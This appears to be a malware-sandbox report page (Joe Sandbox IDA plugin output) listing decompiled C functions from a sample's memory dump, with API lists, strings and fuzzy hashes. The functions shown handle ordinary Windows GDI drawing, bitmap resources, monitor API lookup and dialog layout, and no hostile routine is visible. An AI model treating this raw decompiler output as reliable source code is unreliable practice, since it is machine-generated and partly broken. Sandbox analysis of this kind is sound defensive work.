Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
String ID:
API String ID: 1751264856-0
Opcode ID: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction ID: b09d1b0ebf0f207bae19d4c81b9403c04553573e303ad89ba419e4ec13758243
Opcode Fuzzy Hash: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction Fuzzy Hash: 76214171200915AFC7227B66DC19D2FBBAEFF887407014429F55A82570CB35ACA29F98

Uniqueness

Uniqueness Score: -1.00%

Function 00427432, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00427432(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* _t171;
				struct HDC__* _t188;
				intOrPtr* _t192;
				intOrPtr _t203;
				struct HBRUSH__* _t239;
				intOrPtr* _t244;
				signed int* _t276;
				intOrPtr* _t281;
				intOrPtr _t301;
				intOrPtr _t317;
				intOrPtr* _t339;
				intOrPtr _t342;
				intOrPtr _t343;
				int* _t351;
				intOrPtr* _t352;
				int _t353;
				void* _t355;

				_t171 = E00406520(E0042A17C, _t355);
				_t281 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
					return _t171;
				} else {
					_t339 =  *((intOrPtr*)(_t355 + 8));
					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
					 *((intOrPtr*)(_t355 - 0x38)) = 0;
					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
					 *(_t355 - 0x28) =  *(_t355 - 0x20);
					 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb24;
					 *(_t355 - 4) = 0;
					E0041A611(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb24;
					 *(_t355 - 4) = 1;
					E0041A611(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
					 *((intOrPtr*)(_t355 - 0x10)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
						L21:
						E0041A668(_t355 - 0x3c);
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb14;
						 *(_t355 - 4) = 2;
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb14;
						 *(_t355 - 4) = 3;
						_t171 = E0041A668(_t355 - 0x3c);
						goto L22;
					} else {
						 *((intOrPtr*)(_t355 - 0x14)) = 0;
						while(1) {
							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
							if(_t339 != 0) {
								_t188 =  *(_t339 + 4);
							} else {
								_t188 = 0;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
							_t192 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
							}
							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
							 *((intOrPtr*)( *_t339 + 0x1c))();
							_t203 =  *((intOrPtr*)(_t281 + 0x90));
							_t301 =  *((intOrPtr*)(_t355 - 0x14));
							_t351 = _t301 + _t203;
							 *(_t355 - 0x1c) = _t351;
							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
									_t276 = E0041AFCE(_t281, _t355 - 0x44);
									 *(_t355 - 0x2c) =  ~( *_t276);
									 *(_t355 - 0x28) =  ~(_t276[1]);
								}
							}
							 *((intOrPtr*)( *_t339 + 0x34))(1);
							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
							E00419FFB(_t339, _t355 - 0x54, 0, 0);
							 *((intOrPtr*)( *_t339 + 0x24))(5);
							E00419D35(_t339, _t355 - 0x3c);
							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
							E00419D35(_t339, _t355 - 0x34);
							E0041A1BF(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							E0041A1BF(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
							_t239 = GetStockObject(0);
							_t352 =  *((intOrPtr*)(_t355 + 8));
							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
							_t244 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
								break;
							}
							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
							_t342 =  *((intOrPtr*)(_t355 - 0x10));
							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								L18:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
								if(_t342 == 0) {
									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
										E00427C71(_t281, _t249 - 1, 1);
									}
								}
								goto L21;
							}
							_t343 = _t342 + 1;
							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
							_t353 =  *(_t355 - 0x1c);
							E00428B78(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
							E004298F1( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
							E00429859( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
							E0042986F( *((intOrPtr*)(_t281 + 0x74)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
								_t339 =  *((intOrPtr*)(_t355 + 8));
								continue;
							}
							goto L21;
						}
						_t342 =  *((intOrPtr*)(_t355 - 0x10));
						goto L18;
					}
				}
			}

0x00427437
0x00427441
0x00427448
0x00427805
0x0042780a
0x00427812
0x00427457
0x00427458
0x00427462
0x0042746b
0x0042746e
0x00427474
0x00427477
0x0042747e
0x0042749a
0x0042749f
0x004274a3
0x004274ac
0x004274c2
0x004274cd
0x004274d0
0x004274dd
0x004277ce
0x004277d1
0x004277d9
0x004277e3
0x004277e9
0x004277ed
0x004277f2
0x004277f8
0x004277ff
0x00000000
0x004274e3
0x004274e3
0x004274eb
0x004274f6
0x004274f9
0x004274ff
0x004274fb
0x004274fb
0x004274fb
0x00427508
0x0042751a
0x0042751d
0x00427537
0x00427542
0x00427542
0x00427558
0x00427577
0x0042758f
0x00427599
0x0042759c
0x004275a2
0x004275aa
0x004275ad
0x004275b0
0x004275b9
0x004275c6
0x004275ce
0x004275dc
0x004275df
0x004275df
0x004275c6
0x004275e8
0x004275f9
0x00427606
0x00427611
0x0042761a
0x0042762d
0x00427639
0x00427650
0x00427661
0x00427677
0x00427688
0x00427692
0x00427693
0x00427694
0x00427695
0x00427696
0x00427699
0x0042769c
0x004276a0
0x004276a4
0x004276aa
0x004276b5
0x004276c1
0x004276c4
0x004276ce
0x00000000
0x00000000
0x004276d6
0x004276dc
0x004276eb
0x004277a0
0x004277a5
0x004277b1
0x004277b6
0x004277b8
0x004277c1
0x004277c9
0x004277c9
0x004277c1
0x00000000
0x004277b6
0x004276f3
0x004276f8
0x004276fe
0x0042770a
0x0042771e
0x00427728
0x00427732
0x00427735
0x0042773b
0x0042773e
0x00427744
0x00427747
0x00427753
0x0042775b
0x0042776e
0x00427779
0x00427785
0x00427788
0x00427792
0x00427795
0x004274e8
0x00000000
0x004274e8
0x00000000
0x0042779b
0x0042779d
0x00000000
0x0042779d
0x004274dd

APIs

__EH_prolog.LIBCMT ref: 00427437
GetViewportOrgEx.GDI32(?,?), ref: 00427462
GetSysColor.USER32(00000006), ref: 00427489
CreatePen.GDI32(00000000,00000002,00000000), ref: 00427490
GetSysColor.USER32(00000010), ref: 004274B0
CreatePen.GDI32(00000000,00000003,00000000), ref: 004274B8
GetDeviceCaps.GDI32(?,0000000A), ref: 00427556
GetDeviceCaps.GDI32(?,00000008), ref: 00427563
SetRect.USER32 ref: 00427577
DPtoLP.GDI32(?,?,00000002), ref: 0042758F
Rectangle.GDI32(00000001,7372AD70,?,?,?), ref: 0042762D

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1E1
Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1F5

Part of subcall function 0041A20B: MoveToEx.GDI32(?,?,?,00000000), ref: 0041A225
Part of subcall function 0041A20B: LineTo.GDI32(?,?,?), ref: 0041A236

GetStockObject.GDI32(00000000), ref: 004276A4
FillRect.USER32 ref: 004276B5

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
Part of subcall function 0042986F: SetMapMode.GDI32(?,00000001), ref: 004298A5
Part of subcall function 0042986F: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
Part of subcall function 0042986F: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
Part of subcall function 0042986F: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Strings

(, xrefs: 00427788

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
String ID: (
API String ID: 14264375-3887548279
Opcode ID: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction ID: c53487ea9dce1701cc3862e452b5fc9e596f4e2bded4e1f589efc21baabd4d08
Opcode Fuzzy Hash: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction Fuzzy Hash: EED14970A00219DFCB15DFA4D985EAEBBB5FF48304F14406AF816AB266CB35AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C129, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041C129(int _a4, int _a8, struct HDC__* _a12) {
				int* _v8;
				intOrPtr* _v12;
				void* _v16;
				void* _t37;
				signed int _t42;
				struct HDC__* _t49;
				struct HBITMAP__* _t50;
				intOrPtr* _t60;
				int* _t61;
				int _t66;
				signed int _t69;
				intOrPtr* _t74;
				signed int _t77;
				signed int* _t82;
				int _t83;
				struct HDC__* _t84;
				intOrPtr* _t85;

				_t37 = LoadResource(_a4, _a8);
				if(_t37 == 0) {
					L3:
					return 0;
				}
				_t60 = LockResource(_t37);
				_v12 = _t60;
				if(_t60 == 0) {
					goto L3;
				}
				_t80 =  *_t60 + 0x40;
				_t85 = E00405667( *_t60 + 0x40);
				if(_t85 != 0) {
					E00405700(_t85, _t60, _t80);
					_t82 = _t85 +  *_t85;
					_a8 = 0x10;
					do {
						_t42 =  *_t82;
						_t69 = 0;
						_t74 = 0x42dbc0;
						while(_t42 !=  *_t74) {
							_t74 = _t74 + 8;
							_t69 = _t69 + 1;
							if(_t74 < "DllGetVersion") {
								continue;
							}
							goto L13;
						}
						if(_a12 == 0) {
							_t61 = 0x42dbc4 + _t69 * 8;
							_v8 = _t61;
							GetSysColor( *(0x42dbc4 + _t69 * 8));
							GetSysColor( *_t61);
							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
						} else {
							if( *(0x42dbc4 + _t69 * 8) != 0x12) {
								 *_t82 = 0xffffff;
							}
						}
						L13:
						_t82 =  &(_t82[1]);
						_t14 =  &_a8;
						 *_t14 = _a8 - 1;
					} while ( *_t14 != 0);
					_t83 =  *(_t85 + 4);
					_t66 =  *(_t85 + 8);
					_a4 = _t83;
					_a8 = _t66;
					_t49 = GetDC(0);
					_a12 = _t49;
					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
					_v8 = _t50;
					if(_t50 != 0) {
						_t84 = CreateCompatibleDC(_a12);
						_v16 = SelectObject(_t84, _v8);
						_push(0xcc0020);
						_push(0);
						_push(_t85);
						_t77 = 1;
						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
						SelectObject(_t84, _v16);
						DeleteDC(_t84);
					}
					ReleaseDC(0, _a12);
					E004062E0(_t85);
					return _v8;
				}
				goto L3;
			}

0x0041c138
0x0041c140
0x0041c164
0x00000000
0x0041c164
0x0041c149
0x0041c14d
0x0041c150
0x00000000
0x00000000
0x0041c154
0x0041c15d
0x0041c162
0x0041c16e
0x0041c178
0x0041c17a
0x0041c181
0x0041c181
0x0041c183
0x0041c185
0x0041c18a
0x0041c18e
0x0041c191
0x0041c198
0x00000000
0x00000000
0x00000000
0x0041c19a
0x0041c1a0
0x0041c1bb
0x0041c1c2
0x0041c1c5
0x0041c1d3
0x0041c1f1
0x0041c1a2
0x0041c1aa
0x0041c1ac
0x0041c1ac
0x0041c1aa
0x0041c1f3
0x0041c1f3
0x0041c1f6
0x0041c1f6
0x0041c1f6
0x0041c1fb
0x0041c1fe
0x0041c203
0x0041c206
0x0041c209
0x0041c212
0x0041c215
0x0041c21d
0x0041c220
0x0041c234
0x0041c23c
0x0041c241
0x0041c246
0x0041c247
0x0041c24a
0x0041c266
0x0041c270
0x0041c273
0x0041c273
0x0041c27e
0x0041c285
0x00000000
0x0041c28d
0x00000000

APIs

LoadResource.KERNEL32(00000800,?,00000800,?,00000000,?,00000800), ref: 0041C138
LockResource.KERNEL32(00000000), ref: 0041C143
GetSysColor.USER32 ref: 0041C1C5
GetSysColor.USER32(00000000), ref: 0041C1D3
GetSysColor.USER32(00000000), ref: 0041C1E3
GetDC.USER32(00000000), ref: 0041C209
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041C215
CreateCompatibleDC.GDI32(00000000), ref: 0041C225
SelectObject.GDI32(00000000,00000000), ref: 0041C237
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00CC0020), ref: 0041C266
SelectObject.GDI32(00000000,00000000), ref: 0041C270
DeleteDC.GDI32(00000000), ref: 0041C273
ReleaseDC.USER32 ref: 0041C27E

Strings

DllGetVersion, xrefs: 0041C192

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
String ID: DllGetVersion
API String ID: 257281507-2861820592
Opcode ID: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction ID: 6de00a9f57abe9814b0481798e49b421408311c8e62ebcc167af93806f14bb4d
Opcode Fuzzy Hash: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction Fuzzy Hash: 8441D671640204FFDB219FA4DC88AAF3BB5FF48350B54802AF90597261D7349A56DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD2, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DD2() {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				intOrPtr _t11;
				struct HINSTANCE__* _t15;
				intOrPtr _t17;
				_Unknown_base(*)()* _t18;

				_t17 =  *0x439620; // 0x0
				if(_t17 == 0) {
					_t15 = GetModuleHandleA("USER32");
					if(_t15 == 0) {
						L10:
						 *0x439608 = 0;
						 *0x43960c = 0;
						 *0x439610 = 0;
						 *0x439614 = 0;
						 *0x439618 = 0;
						 *0x43961c = 0;
						 *0x439620 = 1;
						return 0;
					}
					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
					 *0x439608 = _t5;
					if(_t5 == 0) {
						goto L10;
					}
					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
					 *0x43960c = _t6;
					if(_t6 == 0) {
						goto L10;
					}
					_t7 = GetProcAddress(_t15, "MonitorFromRect");
					 *0x439610 = _t7;
					if(_t7 == 0) {
						goto L10;
					}
					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
					 *0x439614 = _t8;
					if(_t8 == 0) {
						goto L10;
					}
					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
					 *0x43961c = _t9;
					if(_t9 == 0) {
						goto L10;
					}
					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
					 *0x439618 = _t10;
					if(_t10 == 0) {
						goto L10;
					}
					_t11 = 1;
					 *0x439620 = _t11;
					return _t11;
				}
				_t18 =  *0x439618; // 0x0
				return 0 | _t18 != 0x00000000;
			}

0x00404dd5
0x00404ddd
0x00404dfa
0x00404dfe
0x00404e76
0x00404e76
0x00404e7c
0x00404e82
0x00404e88
0x00404e8e
0x00404e94
0x00404e9a
0x00000000
0x00404ea4
0x00404e0c
0x00404e10
0x00404e15
0x00000000
0x00000000
0x00404e1d
0x00404e21
0x00404e26
0x00000000
0x00000000
0x00404e2e
0x00404e32
0x00404e37
0x00000000
0x00000000
0x00404e3f
0x00404e43
0x00404e48
0x00000000
0x00000000
0x00404e50
0x00404e54
0x00404e59
0x00000000
0x00000000
0x00404e61
0x00404e65
0x00404e6a
0x00000000
0x00000000
0x00404e6e
0x00404e6f
0x00000000
0x00404e6f
0x00404de1
0x00000000

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,00404F0B), ref: 00404DF4
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00404E0C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00404E1D
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00404E2E
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00404E3F
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00404E50
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00404E61

Strings

USER32, xrefs: 00404DEF
EnumDisplayMonitors, xrefs: 00404E4A
MonitorFromWindow, xrefs: 00404E17
MonitorFromRect, xrefs: 00404E28
GetSystemMetrics, xrefs: 00404E06
MonitorFromPoint, xrefs: 00404E39
GetMonitorInfoA, xrefs: 00404E5B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction ID: 29823efdfea0b27d0eaeb5a685ee6fdb8badc97bb1bd0a8226dd1226ed208354
Opcode Fuzzy Hash: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction Fuzzy Hash: 081124B0A02610EAC711DF35ECD296FBAA4B7887643A4A53FD114E2290D7BC4941CBED

Uniqueness

Uniqueness Score: -1.00%

Function 0042204B, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042204B(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _t59;
				int _t61;
				int _t65;
				struct HWND__* _t74;
				struct HWND__* _t79;
				struct HMENU__* _t81;
				struct HWND__* _t84;
				struct HWND__* _t88;
				signed int _t90;
				signed int _t91;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				int _t108;
				intOrPtr* _t117;
				int* _t118;
				intOrPtr* _t119;
				struct HWND__* _t120;

				_t119 = __ecx;
				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
				_t103 = 0;
				_v4 = _t59;
				if(_a4 != 0) {
					_t117 =  *((intOrPtr*)(_t59 + 0x68));
					if(_t117 != 0) {
						 *((intOrPtr*)( *_t117 + 0x5c))(0);
					}
				}
				_t120 =  *(_t119 + 0x70);
				_t118 = _a8;
				_v12 = _t103;
				if(_t120 == _t103) {
					L13:
					_t118[2] = _v12;
					if(_a4 == _t103) {
						 *(_t119 + 0x9c) = _t103;
						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
						__eflags = _t61;
						_a4 = _t61;
						if(_t61 != 0) {
							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
							__eflags = _t74;
							if(_t74 != 0) {
								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
							}
							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
						}
						__eflags = _t118[1];
						if(_t118[1] != 0) {
							InvalidateRect( *(_t119 + 0x1c), 0, 1);
							SetMenu( *(_t119 + 0x1c), _t118[1]);
						}
						_t108 =  *(_v4 + 0x68);
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 0x5c))(1);
						}
						 *((intOrPtr*)( *_t119 + 0xc8))(1);
						_t65 =  *_t118;
						__eflags = _t65 - 0xe900;
						if(_t65 != 0xe900) {
							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
						}
						ShowWindow(_v0, 5);
						 *(_t119 + 0x48) = _t118[5];
						return E00420A8B(1);
					}
					 *(_t119 + 0x9c) = _t118[4];
					E00420A8B(_t103);
					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
					_v0 = _t79;
					ShowWindow(_t79, _t103);
					_t81 = GetMenu( *(_t119 + 0x1c));
					_t118[1] = _t81;
					if(_t81 != _t103) {
						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
						SetMenu( *(_t119 + 0x1c), _t103);
						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
					}
					_t118[5] =  *(_t119 + 0x48);
					 *(_t119 + 0x48) = _t103;
					E0042065C(_t119, 0x7915);
					if( *_t118 == 0xe900) {
						_t84 = _a4;
					} else {
						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
					}
					if(_t84 == 0) {
						return _t84;
					} else {
						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
					}
				} else {
					goto L4;
				}
				do {
					L4:
					_t88 = _t120;
					_t120 = _v0;
					_t106 =  *((intOrPtr*)(_t88 + 8));
					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
					_v8 = _t90;
					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
						_t91 = 1;
						_a8 = _t91 << _t90 - 0xe800;
						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
							_v12 = _v12 | _a8;
						}
						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
							E00421741(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
						}
					}
				} while (_t120 != 0);
				_t103 = 0;
				goto L13;
			}

0x00422051
0x00422056
0x0042205c
0x0042205e
0x00422066
0x00422068
0x0042206d
0x00422072
0x00422072
0x0042206d
0x00422075
0x00422078
0x0042207e
0x00422082
0x004220ff
0x00422107
0x0042210a
0x004221ba
0x004221c0
0x004221c2
0x004221c4
0x004221cd
0x004221d3
0x004221d5
0x004221d7
0x004221e1
0x004221e1
0x004221ee
0x004221ee
0x004221f4
0x004221f8
0x00422201
0x0042220d
0x0042220d
0x00422217
0x0042221a
0x0042221c
0x00422222
0x00422222
0x0042222b
0x00422231
0x00422233
0x00422235
0x0042223d
0x0042223d
0x00422247
0x00422254
0x00000000
0x00422257
0x00422116
0x0042211c
0x0042212c
0x00422130
0x00422134
0x0042213d
0x00422145
0x00422148
0x00422150
0x0042215a
0x00422160
0x00422160
0x0042216f
0x00422174
0x00422177
0x00422183
0x0042218d
0x00422185
0x00422189
0x00422189
0x00422193
0x00422263
0x00422199
0x00000000
0x004221a1
0x00000000
0x00000000
0x00000000
0x00422084
0x00422084
